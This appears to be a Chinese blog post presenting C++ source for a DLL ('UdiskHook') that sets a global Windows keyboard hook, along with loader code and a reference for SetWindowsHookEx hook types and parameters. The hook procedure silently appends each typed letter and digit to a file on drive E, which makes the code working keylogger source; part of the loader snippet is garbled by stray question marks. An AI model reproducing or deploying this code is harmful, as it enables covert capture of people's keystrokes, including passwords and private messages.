全局消息钩子代码 全局消息钩子是病毒吗

全局消息钩子代码 | 火苗999℃的博客

代码

#ifndef __UdiskHook_h__
#define __UdiskHook_h__
#ifdef     __cplusplus
extern "C" {
#endif
#define    DLL_EXPORT // 
#ifdef     DLL_EXPORT
#define    DLLAPI    __declspec(dllexport)
#else
#define    DLLAPI    __declspec(dllimport)
#endif    
    LRESULT DLLAPI CALLBACK  HookProcAll(int nCode, WPARAM wParam, LPARAM lParam);
    LRESULT DLLAPI CALLBACK  HookProc(int nCode, WPARAM wParam, LPARAM lParam);
    BOOL DLLAPI SetHookProc();
    BOOL DLLAPI UnHookProc();
#ifdef    __cplusplus
}
#endif
#endif // __UdiskHook_h__

#include "UdiskHook.h"
#include 
#include 
HHOOK hHook;
int g_time = 0;
HMODULE GetSelfModuleHandle()
{
    MEMORY_BASIC_INFORMATION mbi;
    return ((::VirtualQuery(GetSelfModuleHandle, &mbi, sizeof(mbi)) != 0)
        ? (HMODULE)mbi.AllocationBase : NULL);
}
LRESULT CALLBACK HookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (0 == g_time)
    {
        g_time = 1;
        hHook = SetWindowsHookEx(WH_KEYBOARD, HookProcAll, GetSelfModuleHandle(), 0);
    }
    if (wParam == ' ' && 0 != g_time)// 空格卸载
    {
        g_time = 0;
        UnhookWindowsHookEx(hHook);
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
    //传递钩子信息 
}
LRESULT CALLBACK HookProcAll(int nCode, WPARAM wParam, LPARAM lParam)
{
    // 记录按键
    if ('a' <= wParam && 'z' >= wParam || 'A' <= wParam && 'Z' >= wParam || '0' <= wParam && '9' >= wParam)
    {
        std::ofstream outFile;
        outFile.open("e:\\ttt.txt", std::ios::app);
        char ch = wParam;
        outFile << ch;
        outFile.close();
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}
int Time1 = 0;
HHOOK hHook1 = NULL;
BOOL SetHookProc()
{
    if (0 == g_time)
    {
        Time1 = 1;
        hHook1 = SetWindowsHookEx(WH_KEYBOARD, HookProcAll, GetSelfModuleHandle(), 0);
        return TRUE;
    }
    return FALSE;
}
BOOL UnHookProc()
{
    if (1 == Time1)
    {
        UnhookWindowsHookEx(hHook1);
        return TRUE;
    }
    return FALSE;
}

程序中加载钩子的代码

typedef HHOOK (_stdcall*  Hook)(int ,WPARAM ,LPARAM );    HINSTANCE hDll = LoadLibrary("UdiskHook.dll");//加载动态链接库文件；    if (hDll != NULL)    {        Hook HookProc=(Hook)GetProcAddress(hDll ,"_HookProc@12");        if (HookProc != NULL)        {             hHook = SetWindowsHookEx(WH_KEYBOARD                                  , (HOOKPROC)HookProc  ? ??? ??? ??? ??? ??? ??? ????? , hDll     ? ??? ??? ??? ??? ??? ??? ?? ??, GetCurrentThreadId() // 为0时是全局钩子? ??? ??? ??? ??? ??? ??? ??? ?? ?);        }        FreeLibrary(hDll);//卸载dll文件；    }

HHOOK SetWindowsHookEx(int idHook,       HOOKPROC lpfn,      HINSTANCE hMod,      DWORD dwThreadId);

idHook:指示欲被安装的挂钩处理过程之类型,此参数可以是以下值之一:

WH_CALLWNDPROC(4): 安装一个挂钩处理过程,在系统将消息发送至目标窗口处理过程之前,对该消息进行监视,详情参见CallWndProc挂钩处理过程.

WH_CALLWNDPROCRET(12) :安装一个挂钩处理过程,它对已被目标窗口处理过程处理过了的消息进行监视,详情参见 CallWndRetProc 挂钩处理过程.

WH_CBT(5) :安装一个挂钩处理过程,接受对CBT应用程序有用的消息 ,详情参见 CBTProc 挂钩处理过程.

WH_DEBUG(9):安装一个挂钩处理过程以便对其他挂钩处理过程进行调试, 详情参见DebugProc挂钩处理过程.

WH_FOREGROUNDIDLE(11):安装一个挂钩处理过程,该挂钩处理过程当应用程序的前台线程即将进入空闲状态时被调用,它有助于在空闲时间内执行低优先级的任务.

WH_GETMESSAGE(3):安装一个挂钩处理过程对寄送至消息队列的消息进行监视,详情参见 GetMsgProc 挂钩处理过程.

WH_JOURNALPLAYBACK(1):安装一个挂钩处理过程,对此前由WH_JOURNALRECORD 挂钩处理过程纪录的消息进行寄送.详情参见 JournalPlaybackProc挂钩处理过程.

WH_JOURNALRECORD(0):安装一个挂钩处理过程,对寄送至系统消息队列的输入消息进行纪录.详情参见JournalRecordProc挂钩处理过程.

WH_KEYBOARD(2):安装一个挂钩处理过程对击键消息进行监视. 详情参见KeyboardProc挂钩处理过程.

WH_KEYBOARD_LL(13):此挂钩只能在Windows NT中被安装,用来对底层的键盘输入事件进行监视.详情参见LowLevelKeyboardProc挂钩处理过程.

WH_MOUSE(7):安装一个挂钩处理过程,对鼠标消息进行监视. 详情参见 MouseProc挂钩处理过程.

WH_MOUSE_LL(14):此挂钩只能在Windows NT中被安装,用来对底层的鼠标输入事件进行监视.详情参见LowLevelMouseProc挂钩处理过程.

WH_MSGFILTER(-1):安装一个挂钩处理过程, 以监视由对话框、消息框、菜单条、或滚动条中的输入事件引发的消息.详情参见MessageProc挂钩处理过程.

WH_SHELL(10):安装一个挂钩处理过程以接受对外壳应用程序有用的通知, 详情参见 ShellProc挂钩处理过程.

WH_SYSMSGFILTER(6):安装一个挂钩处理过程,以监视由对话框、消息框、菜单条、或滚动条中的输入事件引发的消息.这个挂钩处理过程对系统中所有应用程序的这类消息都进行监视.详情参见 SysMsgProc挂钩处理过程.

lpfn:指向相应的挂钩处理过程.若参数dwThreadId为0或者指示了一个其他进程创建的线程之标识符,则参数lpfn必须指向一个动态链接中的挂钩处理过程.否则,参数lpfn可以指向一个与当前进程相关的代码中定义的挂钩处理过程.

hMod:指示了一个动态链接的句柄,该动态连接库包含了参数lpfn 所指向的挂钩处理过程.若参数dwThreadId指示的线程由当前进程创建,并且相应的挂钩处理过程定义于当前进程相关的代码中,则参数hMod必须被设置为NULL(0).

dwThreadId:指示了一个线程标识符,挂钩处理过程与线程相关.若此参数值为0,则该挂钩处理过程与所有现存的线程相关.

返回值:若此函数执行成功,则返回值就是该挂钩处理过程的句柄;若此函数执行失败,则返回值为NULL(0).若想获得更多错误信息,请调用GetLasError函数.

备注:若参数hMod为NULL,而参数dwThreadld为0或者指示了一个其他进程创建的线程标识符,则会产生错误.

对函数CallNextHookEx进行调用以下链接下一个挂钩处理过程是可选的,但也是被推荐的否则,其他安装了此挂钩的应用程序将无法获得此挂钩通知,从而可能导致错误的行为.除非您确实希望防止其他应用程序看到此挂钩通知,您应当调用函数CallNextHookEx.

在终止一个应用程序之前,必须调用函数UnhookWindowsHookEx以释放与此挂钩相关的系统资源.

挂钩的作用域依赖与挂钩的类型.一些挂钩只能被设置成系统作用域,其他挂钩(如下所示)还可以被设置为某一特定线程的作用域:

WH_CALLWNDPROC 线程或系统

WH_CALLWNDPROCRET 线程或系统

WH_CBT 线程或系统

WH_DEBUG 线程或系统

WH_FOREGROUNDIDLE 线程或系统

WH_GETMESSAGE 线程或系统

WH_JOURNALPLAYBACK 系统

WH_JOURNALRECORD 系统

WH_KEYBOARD 线程或系统

WH_KEYBOARD_LL 线程或系统

WH_MOUSE 线程或系统

WH_MOUSE_LL 线程或系统

WH_MSGFILTER 线程或系统

WH_SHELL 线程或系统

WH_SYSMSGFILTER 系统

对于一个特定的挂钩类型,现成的挂钩先被调用,然后才是系统挂钩被调用.

系统挂钩作为共享资源,安装一次就对所用应用程序产生影响.所有的系统挂钩函数必须在库中.系统挂钩应当被限制用于一些特殊用途的应用程序或者用来作为应用程序调试的辅助工具.不再需要挂钩的库应当将相应的挂钩处理过程删除掉.